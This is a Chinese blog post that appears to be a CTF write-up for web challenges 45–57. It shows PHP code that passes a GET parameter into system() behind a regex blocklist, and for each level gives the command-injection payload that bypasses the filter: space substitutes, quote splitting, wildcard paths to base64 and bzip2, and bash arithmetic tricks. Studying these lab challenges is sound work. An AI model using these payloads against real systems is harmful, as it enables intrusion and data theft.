前言
争取今天写完
web45
代码语言:javascript复制 <?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
还是那个垃圾桶的问题,ban了空格。
对了,昨天有个事忘说了
- *可以代替0个及以上任意字符
- ?可以代表1个任意字符
?c=tac flag.php||
tac绕cat
flag绕flag
||截断
web46
代码语言:javascript复制 <?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag| |[0-9]|\$|*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
ban了
用单引号绕
代码语言:javascript复制?c=tac<>fl''ag.php||
?c=nl<>fl''ag.php||
web47-51
46的Payload通杀
web52
代码语言:javascript复制 <?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag| |[0-9]|*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|x09|x26|>|</i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}
这题ban了<>,但把$放出来了
换个绕空格的方法就行
代码语言:javascript复制?c=nl${IFS}fl''ag.php||
web53
代码语言:javascript复制 <?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag| |[0-9]|*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|x09|x26|>|</i", $c)){
echo($c);
$d = system($c);
echo "<br>".$d;
}else{
echo 'no';
}
}else{
highlight_file(__FILE__);
}
换姿势了?(不是
仔细看看代码,还是往system()里传入命令
先ls试一下
直接读,nl还在,$也在
代码语言:javascript复制?c=nl${IFS}flag.php
web54
又换姿势了?
代码语言:javascript复制 <?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|`|%|x09|x26|>|</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
不得不再提到一个命令
uniq
uniq命令是Linux中的一个文本处理命令,用于去除重复的行。 它可以从输入文件或标准输入中读取文本,并将重复的行过滤掉,只输出不重复的行。
由此,直接传
代码语言:javascript复制?c=uniq${IFS}f???.php
web55
代码语言:javascript复制 <?php
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|[a-z]|`|%|x09|x26|>|</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
这个难点,无字母数字命令执行
代码语言:javascript复制bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php 对应的就是/???/???64 ???.??? /usr/bin目录: 主要放置一些应用软件工具的必备执行档例如c 、g 、gcc、chdrv、diff、dig、du、eject、elm、free、gnome*、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb*、wget等。 我们可以利用/usr/bin下的bzip2 ——引自https://blog.csdn.net/weixin_54515836/article/details/113305690
?c=/???/????64 ????????/ //就是bin/base64 flag.php
?c=/???/???/???2 ????.??? //也就是/usr/bin/bzip2 flag.php
后者直接url /flag.php.bz2下载
web56
这是真不会
Orz
web57
代码语言:javascript复制 <?php
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|[a-z]|[0-9]|`||#|'|"|`|%|x09|x26|x0a|>|<|.|,|?|*|-|=|[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
换姿势了
- ${_} 上次命令执行的结果
- $(()) 进行运算
- (("")) == 0
对((“”))=0,对((“”))取反即(( ((“”))))为-1,37个-1相减得到-37,再取反得到36
得到
代码语言:javascript复制?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
另一种姿势
代码语言:javascript复制?c=grep${IFS}'fla'${IFS}fla??php
grep 指令用于查找内容包含指定的范本样式的文件,如果发现某文件的内容符合所指定的范本样式,预设 grep 指令会把含有范本样式的那一列显示出来。
今天是写不完喽